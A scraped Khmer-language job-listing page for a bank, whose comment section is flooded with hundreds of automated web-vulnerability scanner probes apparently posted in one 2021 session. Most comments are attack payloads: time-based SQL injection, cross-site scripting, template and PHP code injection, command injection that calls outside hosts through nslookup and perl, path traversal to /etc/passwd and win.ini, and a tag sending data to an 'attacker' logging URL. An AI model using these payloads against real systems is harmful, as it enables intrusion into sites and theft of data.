ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ធនាគារ​ ភីភីស៊ីប៊ែង
យើងនឹងបង្កើតទំនាក់ទំនងប្រកបដោយភាពស្និទ្ធស្នាល និងការជឿទុកចិត្ត ជូនដល់អតិថិជនដ៏មានតម្លៃរបស់ពួកយើង។ ពួកយើងក៏បានបង្កប់នូវគោលគំនិត “ភាពឆ្ពោះទៅមុខ” នៅក្នុងនិមិត្តសញ្ញារបស់ពួកយើង ដែលបង្ហាញពីការរីកចម្រីនប្រកបដោយនិរន្តភាពតាមរយៈ ការផ្លាស់ប្តូរ និងការបង្កើតថ្មី។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 224

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 111 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 07:32:38


  @@TmxJ4


 • pHqghUme

  2021-05-06 07:32:34


  1'"


 • pHqghUme

  2021-05-06 07:32:33


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 07:32:13


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 07:31:54


  fLdJ8Rt1')) OR 65=(SELECT 65 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:31:34


  lxDxiAbv') OR 325=(SELECT 325 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:31:12


  KkapGDWY' OR 515=(SELECT 515 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:30:45


  -1)) OR 195=(SELECT 195 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:30:22


  -5) OR 256=(SELECT 256 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:30:00


  -5 OR 971=(SELECT 971 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:29:33


  MrsO57H9'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:28:53


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:28:29


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:28:06


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:27:29


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 07:27:07


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 07:26:42


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 07:26:19


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 07:25:54


  -1" OR 2+438-438-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:25:53


  -1' OR 2+395-395-1=0+0+0+1 or 'lGZbWGQI'='


 • pHqghUme

  2021-05-06 07:25:52


  -1' OR 2+848-848-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:25:51


  -1 OR 2+362-362-1=0+0+0+1


 • pHqghUme

  2021-05-06 07:25:49


  -1 OR 2+998-998-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:25:47


  GP68WIFQ


 • pHqghUme

  2021-05-06 07:25:19


  1


 • pHqghUme

  2021-05-06 07:25:03


  1


 • @@0gF18

  2021-05-06 07:24:40


  1


 • 1'"

  2021-05-06 07:24:32


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:24:31


  1


 • muPY5C8r')) OR 254=(SELECT 254 FROM PG_SLEEP(15))--

  2021-05-06 07:24:12


  1


 • wC5Nk0E9') OR 15=(SELECT 15 FROM PG_SLEEP(15))--

  2021-05-06 07:23:55


  1


 • 2a9QFkhG' OR 49=(SELECT 49 FROM PG_SLEEP(15))--

  2021-05-06 07:23:30


  1


 • Lh06E3YO'; waitfor delay '0:0:15' --

  2021-05-06 07:23:08


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:22:46


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:22:26


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:22:07


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:21:48


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:21:32


  1


 • -1" OR 2+460-460-1=0+0+0+1 --

  2021-05-06 07:21:20


  1


 • -1' OR 2+956-956-1=0+0+0+1 --

  2021-05-06 07:21:19


  1


 • -1' OR 2+976-976-1=0+0+0+1 or 'gUTraT58'='

  2021-05-06 07:21:19


  1


 • -1 OR 2+276-276-1=0+0+0+1 --

  2021-05-06 07:21:18


  1


 • -1 OR 2+136-136-1=0+0+0+1

  2021-05-06 07:21:18


  1


 • OKnVWgHm

  2021-05-06 07:21:17


  1


 • pHqghUme

  2021-05-06 07:20:53


  1


 • pHqghUme

  2021-05-06 07:20:37


  1


 • pHqghUme

  2021-05-06 07:20:23


  1


 • pHqghUme

  2021-05-06 07:20:20


  1


 • pHqghUme

  2021-05-06 07:20:19


  1


 • pHqghUme

  2021-05-06 07:20:06


  1


 • pHqghUme

  2021-05-06 07:19:50


  1


 • pHqghUme

  2021-05-06 07:19:37


  1


 • pHqghUme

  2021-05-06 07:19:22


  1


 • pHqghUme

  2021-05-06 07:19:08


  1


 • pHqghUme

  2021-05-06 07:18:55


  1


 • pHqghUme

  2021-05-06 07:18:42


  1


 • pHqghUme

  2021-05-06 07:18:31


  1


 • pHqghUme

  2021-05-06 07:18:17


  1


 • pHqghUme

  2021-05-06 07:18:07


  1


 • pHqghUme

  2021-05-06 07:18:07


  1


 • pHqghUme

  2021-05-06 07:18:07


  1


 • pHqghUme

  2021-05-06 07:18:06


  1


 • pHqghUme

  2021-05-06 07:18:06


  1


 • pHqghUme

  2021-05-06 07:18:05


  1


 • pHqghUme

  2021-05-06 07:17:55


  1


 • pHqghUme

  2021-05-06 07:17:44


  1


 • pHqghUme

  2021-05-06 07:17:33


  1


 • pHqghUme

  2021-05-06 07:17:30


  1


 • pHqghUme

  2021-05-06 07:17:29


  1


 • pHqghUme

  2021-05-06 07:17:17


  1


 • pHqghUme

  2021-05-06 07:17:05


  1


 • pHqghUme

  2021-05-06 07:16:51


  1


 • pHqghUme

  2021-05-06 07:16:41


  1<OjOS0C<


 • pHqghUme

  2021-05-06 07:16:34


  1<img sRc='http://attacker-9710/log.php?


 • pHqghUme

  2021-05-06 07:16:27


  1


 • pHqghUme

  2021-05-06 07:16:25


  1<OBy1Ps x=9445>


 • pHqghUme

  2021-05-06 07:16:16


  1<ifRAme sRc=9466.com></IfRamE>


 • pHqghUme

  2021-05-06 07:16:07


  1<WIEDOV>NII4J[!+!]</WIEDOV>


 • pHqghUme

  2021-05-06 07:15:58


  1HgDrt <ScRiPt >GWR7(9203)</ScRiPt>


 • pHqghUme

  2021-05-06 07:15:52


  1<% contenteditable onresize=GWR7(9490)>


 • pHqghUme

  2021-05-06 07:15:47


  1


 • pHqghUme

  2021-05-06 07:15:46


  1}body{acu:Expre/**/SSion(GWR7(9921))}


 • pHqghUme

  2021-05-06 07:15:43


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:15:39


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:15:33


  1<input autofocus onfocus=GWR7(9528)>


 • pHqghUme

  2021-05-06 07:15:28


  1


 • pHqghUme

  2021-05-06 07:15:27


  1&lt;ScRiPt&gt;GWR7(9247)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:15:24


  1\u003CScRiPt\GWR7(9878)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:15:19


  %31%3C%53%63%52%69%50%74%20%3E%47%57%52%37%289246%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:15:16


  1<img/src=">" onerror=alert(9235)>


 • pHqghUme

  2021-05-06 07:15:12


  1<img src=xyz OnErRor=GWR7(9557)>


 • pHqghUme

  2021-05-06 07:15:11


  1


 • pHqghUme

  2021-05-06 07:15:09


  1<img src=//xss.bxss.me/t/dot.gif onload=GWR7(9532)>


 • pHqghUme

  2021-05-06 07:15:04


  1<body onload=GWR7(9716)>


 • pHqghUme

  2021-05-06 07:15:00


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9785'>


 • pHqghUme

  2021-05-06 07:14:55


  1


 • pHqghUme

  2021-05-06 07:14:53


  1<isindex type=image src=1 onerror=GWR7(9132)>


 • pHqghUme

  2021-05-06 07:14:44


  1<ScRiPt >GWR7(9613)</ScRiPt>


 • pHqghUme

  2021-05-06 07:14:38


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9673></ScRiPt>


 • pHqghUme

  2021-05-06 07:14:36


  1


 • pHqghUme

  2021-05-06 07:14:31


  1<ScRiPt >GWR7(9847)</ScRiPt>


 • pHqghUme

  2021-05-06 07:14:26


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%47%57%52%37%28%39%33%34%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:14:21


  1<script>GWR7(9633)</script>


 • pHqghUme

  2021-05-06 07:14:18


  1


 • pHqghUme

  2021-05-06 07:14:17


  1


 • pHqghUme

  2021-05-06 07:14:16


  1<WSA2KJ>MXFHC[!+!]</WSA2KJ>


 • pHqghUme

  2021-05-06 07:14:16


  1


 • pHqghUme

  2021-05-06 07:14:15


  1


 • pHqghUme

  2021-05-06 07:14:14


  1


 • pHqghUme

  2021-05-06 07:14:13


  1


 • pHqghUme

  2021-05-06 07:14:11


  1<ScRiPt >GWR7(9393)</ScRiPt>


 • pHqghUme

  2021-05-06 07:14:06


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:14:02


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:13:56


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:13:53


  1


 • pHqghUme

  2021-05-06 07:13:44


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:13:37


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:13:32


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:13:30


  1


 • pHqghUme

  2021-05-06 07:13:25


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:13:17


  acux4213%C0%BEz1%C0%BCz2a%90bcxuca4213


 • pHqghUme

  2021-05-06 07:13:11


  acu8658%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca8658


 • pHqghUme

  2021-05-06 07:13:03


  19693484


 • pHqghUme

  2021-05-06 07:12:57


  '"()&%<acx><ScRiPt >GWR7(9322)</ScRiPt>


 • pHqghUme

  2021-05-06 07:12:51


  1'"()&%<acx><ScRiPt >GWR7(9872)</ScRiPt>


 • pHqghUme<gOBkIo<

  2021-05-06 07:12:45


  1


 • pHqghUme<img sRc='http://attacker-9595/log.php?

  2021-05-06 07:12:40


  1


 • pHqghUme<ZffKuy x=9762>

  2021-05-06 07:12:37


  1


 • pHqghUme<ifRAme sRc=9694.com></IfRamE>

  2021-05-06 07:12:32


  1


 • pHqghUme<WFPMFI>8MJFM[!+!]</WFPMFI>

  2021-05-06 07:12:25


  1


 • pHqghUmexFtLj <ScRiPt >GWR7(9201)</ScRiPt>

  2021-05-06 07:12:20


  1


 • pHqghUme<% contenteditable onresize=GWR7(9485)>

  2021-05-06 07:12:14


  1


 • pHqghUme}body{acu:Expre/**/SSion(GWR7(9202))}

  2021-05-06 07:12:08


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:12:03


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:11:59


  1


 • pHqghUme<input autofocus onfocus=GWR7(9983)>

  2021-05-06 07:11:53


  1


 • pHqghUme&lt;ScRiPt&gt;GWR7(9127)&lt;/sCripT&gt;

  2021-05-06 07:11:45


  1


 • pHqghUme\u003CScRiPt\GWR7(9050)\u003C/sCripT\u003E

  2021-05-06 07:11:38


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%47%57%52%37%289225%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:11:32


  1


 • pHqghUme<img/src=">" onerror=alert(9160)>

  2021-05-06 07:11:26


  1


 • pHqghUme<img src=xyz OnErRor=GWR7(9224)>

  2021-05-06 07:11:19


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=GWR7(9416)>

  2021-05-06 07:11:12


  1


 • pHqghUme<body onload=GWR7(9824)>

  2021-05-06 07:11:05


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9794'>

  2021-05-06 07:10:58


  1


 • pHqghUme<isindex type=image src=1 onerror=GWR7(9233)>

  2021-05-06 07:10:51


  1


 • pHqghUme<ScRiPt >GWR7(9985)</ScRiPt>

  2021-05-06 07:10:35


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9244></ScRiPt>

  2021-05-06 07:10:24


  1


 • pHqghUme<ScRiPt >GWR7(9677)</ScRiPt>

  2021-05-06 07:10:17


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%47%57%52%37%28%39%32%38%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:10:07


  1


 • pHqghUme<script>GWR7(9231)</script>

  2021-05-06 07:09:58


  1


 • pHqghUme<W3C3RF>VSTI6[!+!]</W3C3RF>

  2021-05-06 07:09:49


  1


 • pHqghUme<ScRiPt >GWR7(9480)</ScRiPt>

  2021-05-06 07:09:41


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:09:34


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:09:26


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:09:20


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:09:13


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:09:07


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:09:01


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:08:54


  1


 • acux5282%C0%BEz1%C0%BCz2a%90bcxuca5282

  2021-05-06 07:08:47


  1


 • acu5115%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5115

  2021-05-06 07:08:38


  1


 • pHqghUme9907302

  2021-05-06 07:08:29


  1


 • '"()&%<acx><ScRiPt >GWR7(9672)</ScRiPt>

  2021-05-06 07:08:19


  1


 • pHqghUme'"()&%<acx><ScRiPt >GWR7(9210)</ScRiPt>

  2021-05-06 07:08:13


  1


 • pHqghUme

  2021-05-06 07:08:06


  1


 • pHqghUme

  2021-05-06 07:07:59


  1


 • pHqghUme

  2021-05-06 07:07:52


  1


 • pHqghUme

  2021-05-06 07:07:45


  1


 • pHqghUme

  2021-05-06 07:07:38


  1


 • pHqghUme

  2021-05-06 07:07:32


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:07:32


  1


 • pHqghUme

  2021-05-06 07:07:31


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:07:30


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:07:30


  1


 • pHqghUme

  2021-05-06 07:07:29


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:07:28


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:07:27


  `(nslookup hitespvyqgybmc6604.bxss.me||perl -e "gethostbyname('hitespvyqgybmc6604.bxss.me')")`


 • pHqghUme

  2021-05-06 07:07:27


  <!--


 • pHqghUme

  2021-05-06 07:07:26


  '"


 • pHqghUme

  2021-05-06 07:07:26


  |(nslookup hithrpwgkfarx8b3f7.bxss.me||perl -e "gethostbyname('hithrpwgkfarx8b3f7.bxss.me')")


 • pHqghUme

  2021-05-06 07:07:26


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 07:07:25


  1


 • <!--

  2021-05-06 07:07:24


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:07:24


  1


 • '"

  2021-05-06 07:07:23


  1


 • ${@print(md5(31337))}

  2021-05-06 07:07:23


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:07:22


  1


 • pHqghUme

  2021-05-06 07:07:21


  1


 • pHqghUme

  2021-05-06 07:07:20


  1


 • pHqghUme

  2021-05-06 07:07:20


  $(nslookup hitfmxmqzgwyw13c66.bxss.me||perl -e "gethostbyname('hitfmxmqzgwyw13c66.bxss.me')")


 • ';print(md5(31337));$a='

  2021-05-06 07:07:20


  1


 • pHqghUme

  2021-05-06 07:07:19


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:07:19


  1


 • pHqghUme

  2021-05-06 07:07:19


  (nslookup hitqtbxrlcocg0cb12.bxss.me||perl -e "gethostbyname('hitqtbxrlcocg0cb12.bxss.me')")


 • pHqghUme

  2021-05-06 07:07:19


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 07:07:18


  1


 • /xfs.bxss.me

  2021-05-06 07:07:18


  1


 • pHqghUme

  2021-05-06 07:07:18


  |echo nlwgww$()\ fwrkie\nz^xyu||a #' |echo nlwgww$()\ fwrkie\nz^xyu||a #|" |echo nlwgww$()\ fwrkie\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:07:17


  1


 • pHqghUme

  2021-05-06 07:07:17


  &echo zbbizo$()\ kudtzh\nz^xyu||a #' &echo zbbizo$()\ kudtzh\nz^xyu||a #|" &echo zbbizo$()\ kudtzh\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:07:17


  1


 • pHqghUme

  2021-05-06 07:07:16


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:07:16


  1


 • pHqghUme

  2021-05-06 07:07:15


  '+'A'.concat(70-3).concat(22*4).concat(109).concat(73).concat(106).concat(84)+(require'socket' Socket.gethostbyname('hitqo'+'durpywlua1088.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:07:15


  1


 • pHqghUme

  2021-05-06 07:07:15


  1


 • pHqghUme

  2021-05-06 07:07:15


  echo axltrz$()\ mffbob\nz^xyu||a #' &echo axltrz$()\ mffbob\nz^xyu||a #|" &echo axltrz$()\ mffbob\nz^xyu||a #


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:07:14


  1


 • pHqghUme

  2021-05-06 07:07:13


  1


 • pHqghUme

  2021-05-06 07:07:13


  "+"A".concat(70-3).concat(22*4).concat(115).concat(89).concat(121).concat(86)+(require"socket" Socket.gethostbyname("hithl"+"widicdij98867.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 07:07:13


  1


 • pHqghUme

  2021-05-06 07:07:12


  1


 • pHqghUme

  2021-05-06 07:07:12


  1


 • '+'A'.concat(70-3).concat(22*4).concat(114).concat(79).concat(108).concat(81)+(require'socket' Socket.gethostbyname('hitqs'+'mkzyguntf2a5f.bxss.me.')[3].to_s)+'

  2021-05-06 07:07:12


  1


 • pHqghUme

  2021-05-06 07:07:11


  1


 • "+"A".concat(70-3).concat(22*4).concat(121).concat(65).concat(121).concat(87)+(require"socket" Socket.gethostbyname("hitld"+"meuurffr56138.bxss.me.")[3].to_s)+"

  2021-05-06 07:07:11


  1


 • pHqghUme

  2021-05-06 07:07:11


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:07:10


  1


 • pHqghUme

  2021-05-06 07:07:10


  1


 • pHqghUme

  2021-05-06 07:07:10


  HttP://bxss.me/t/xss.html?%00


 • `(nslookup hitsconzpgtqhfe99f.bxss.me||perl -e "gethostbyname('hitsconzpgtqhfe99f.bxss.me')")`

  2021-05-06 07:07:10


  1


 • pHqghUme

  2021-05-06 07:07:09


  1


 • pHqghUme

  2021-05-06 07:07:09


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:07:09


  1


 • |(nslookup hitzbgprvaxoc9a4d0.bxss.me||perl -e "gethostbyname('hitzbgprvaxoc9a4d0.bxss.me')")

  2021-05-06 07:07:09


  1


 • pHqghUme

  2021-05-06 07:07:08


  '"()


 • pHqghUme

  2021-05-06 07:07:07


  1


 • pHqghUme

  2021-05-06 07:07:07


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:07:07


  1


 • pHqghUme

  2021-05-06 07:07:06


  1


 • pHqghUme

  2021-05-06 07:07:06


  1


 • pHqghUme

  2021-05-06 07:07:06


  1


 • $(nslookup hitypnrfumjbp6d2ef.bxss.me||perl -e "gethostbyname('hitypnrfumjbp6d2ef.bxss.me')")

  2021-05-06 07:07:05


  1


 • pHqghUme

  2021-05-06 07:07:05


  1


 • pHqghUme

  2021-05-06 07:07:05


  1


 • pHqghUme

  2021-05-06 07:07:04


  1


 • '"()

  2021-05-06 07:07:04


  1


 • pHqghUme

  2021-05-06 07:07:04


  1


 • pHqghUme

  2021-05-06 07:07:03


  ".gethostbyname(lc("hitsf"."rswhhyka6ea2c.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(86).chr(112).chr(79)."


 • (nslookup hitfzyticrgxr09581.bxss.me||perl -e "gethostbyname('hitfzyticrgxr09581.bxss.me')")

  2021-05-06 07:07:03


  1


 • pHqghUme

  2021-05-06 07:07:02


  '.gethostbyname(lc('hiteo'.'bbqoyleg77948.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(72).chr(104).chr(73).'


 • |echo ralexn$()\ tvpknm\nz^xyu||a #' |echo ralexn$()\ tvpknm\nz^xyu||a #|" |echo ralexn$()\ tvpknm\nz^xyu||a #

  2021-05-06 07:07:02


  1


 • pHqghUme

  2021-05-06 07:07:02


  1


 • pHqghUme

  2021-05-06 07:07:02


  1


 • &echo qvrvdv$()\ mbrrzs\nz^xyu||a #' &echo qvrvdv$()\ mbrrzs\nz^xyu||a #|" &echo qvrvdv$()\ mbrrzs\nz^xyu||a #

  2021-05-06 07:07:00


  1


 • ".gethostbyname(lc("hitei"."bybfubtxab4d9.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(65).chr(112).chr(86)."

  2021-05-06 07:07:00


  1


 • '.gethostbyname(lc('hitbs'.'hjpprslxf9af6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(80).chr(114).chr(80).'

  2021-05-06 07:06:59


  1


 • echo wwmeab$()\ xvitjt\nz^xyu||a #' &echo wwmeab$()\ xvitjt\nz^xyu||a #|" &echo wwmeab$()\ xvitjt\nz^xyu||a #

  2021-05-06 07:06:59


  1


 • pHqghUme

  2021-05-06 07:06:59


  1


 • pHqghUme

  2021-05-06 07:06:59


  bxss.me


 • pHqghUme

  2021-05-06 07:06:57


  1


 • pHqghUme

  2021-05-06 07:06:57


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:06:56


  1


 • pHqghUme

  2021-05-06 07:06:56


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:06:55


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 07:06:55


  1


 • pHqghUme

  2021-05-06 07:06:54


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 07:06:54


  1


 • pHqghUme

  2021-05-06 07:06:53


  1


 • pHqghUme

  2021-05-06 07:06:53


  1


 • bxss.me

  2021-05-06 07:06:52


  1


 • pHqghUme

  2021-05-06 07:06:51


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:06:50


  1


 • pHqghUme

  2021-05-06 07:06:49


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:06:49


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:06:48


  1


 • pHqghUme

  2021-05-06 07:06:48


  ^(#$!@#$)(()))******


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:06:46


  1


 • pHqghUme

  2021-05-06 07:06:46


  1


 • pHqghUme

  2021-05-06 07:06:46


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 07:06:45


  )


 • pHqghUme

  2021-05-06 07:06:44


  1&n931129=v956315


 • pHqghUme

  2021-05-06 07:06:44


  1


 • pHqghUme

  2021-05-06 07:06:44


  1


 • pHqghUme

  2021-05-06 07:06:43


  1


 • pHqghUme

  2021-05-06 07:06:43


  ../1


 • pHqghUme

  2021-05-06 07:06:43


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:06:43


  1


 • pHqghUme

  2021-05-06 07:06:41


  1


 • !(()&&!|*|*|

  2021-05-06 07:06:41


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:06:40


  1


 • pHqghUme

  2021-05-06 07:06:40


  1


 • pHqghUme

  2021-05-06 07:06:40


  1


 • pHqghUme

  2021-05-06 07:06:38


  1


 • pHqghUme

  2021-05-06 07:06:38


  1


 • pHqghUme

  2021-05-06 07:06:38


  ../../../../../../../../../../../../../../windows/win.ini


 • )

  2021-05-06 07:06:38


  1


 • pHqghUme

  2021-05-06 07:06:36


  1


 • pHqghUme&n961862=v908964

  2021-05-06 07:06:36


  1


 • pHqghUme

  2021-05-06 07:06:36


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:06:36


  1


 • pHqghUme

  2021-05-06 07:06:34


  1


 • ../pHqghUme

  2021-05-06 07:06:34


  1


 • pHqghUme

  2021-05-06 07:06:34


  1


 • pHqghUme

  2021-05-06 07:06:32


  1


 • pHqghUme

  2021-05-06 07:06:32


  1


 • pHqghUme

  2021-05-06 07:06:32


  1


 • pHqghUme

  2021-05-06 07:06:32


  1


 • pHqghUme

  2021-05-06 07:06:31


  1


 • pHqghUme

  2021-05-06 07:06:31


  1


 • pHqghUme

  2021-05-06 07:06:30


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:06:30


  1


 • pHqghUme

  2021-05-06 07:06:30


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:06:30


  1


 • pHqghUme

  2021-05-06 07:06:29


  1


 • pHqghUme

  2021-05-06 07:06:29


  1


 • pHqghUme

  2021-05-06 07:06:29


  1


 • pHqghUme

  2021-05-06 07:06:28


  1


 • pHqghUme

  2021-05-06 07:06:28


  1


 • pHqghUme

  2021-05-06 07:06:28


  1


 • pHqghUme

  2021-05-06 07:06:27


  1


 • pHqghUme

  2021-05-06 07:06:26


  1


 • pHqghUme

  2021-05-06 07:06:26


  1


 • pHqghUme

  2021-05-06 07:06:24


  1


 • pHqghUme

  2021-05-06 07:06:24


  1


 • pHqghUme

  2021-05-06 07:06:23


  1


 • pHqghUme

  2021-05-06 07:06:23


  1


 • pHqghUme

  2021-05-06 07:06:23


  1


 • pHqghUme

  2021-05-06 07:06:22


  1


 • pHqghUme

  2021-05-06 07:06:21


  1


 • pHqghUme

  2021-05-06 07:06:20


  1


 • TDZxV3JKeFM=

  2021-05-06 07:06:19


  1


 • pHqghUme

  2021-05-06 07:06:19


  1


 • pHqghUme

  2021-05-06 07:06:18


  1


 • pHqghUme

  2021-05-06 07:06:17


  ${10000002+9999617}


 • pHqghUme

  2021-05-06 07:06:17


  1


 • ${10000152+9999618}

  2021-05-06 07:06:16


  1


 • pHqghUme

  2021-05-06 07:06:16


  1


 • pHqghUme

  2021-05-06 07:06:16


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:06:16


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:06:15


  1


 • pHqghUme

  2021-05-06 07:06:14


  1


 • pHqghUme

  2021-05-06 07:06:13


  1


 • pHqghUme

  2021-05-06 07:06:12


  1


 • pHqghUme

  2021-05-06 07:06:12


  1


 • pHqghUme

  2021-05-06 07:06:09


  1


 • pHqghUme

  2021-05-06 07:06:06


  55jdaGdX


 • KULkETfC

  2021-05-06 07:06:05


  1


 • pHqghUme

  2021-05-06 07:06:05


  "+response.write(9020501*9952111)+"


 • pHqghUme

  2021-05-06 07:06:04


  1


 • pHqghUme

  2021-05-06 07:06:04


  '+response.write(9020501*9952111)+'


 • pHqghUme

  2021-05-06 07:06:02


  1


 • pHqghUme

  2021-05-06 07:06:02


  response.write(9020501*9952111)


 • "+response.write(9922817*9252121)+"

  2021-05-06 07:06:01


  1


 • '+response.write(9922817*9252121)+'

  2021-05-06 07:06:00


  1


 • response.write(9922817*9252121)

  2021-05-06 07:05:58


  1


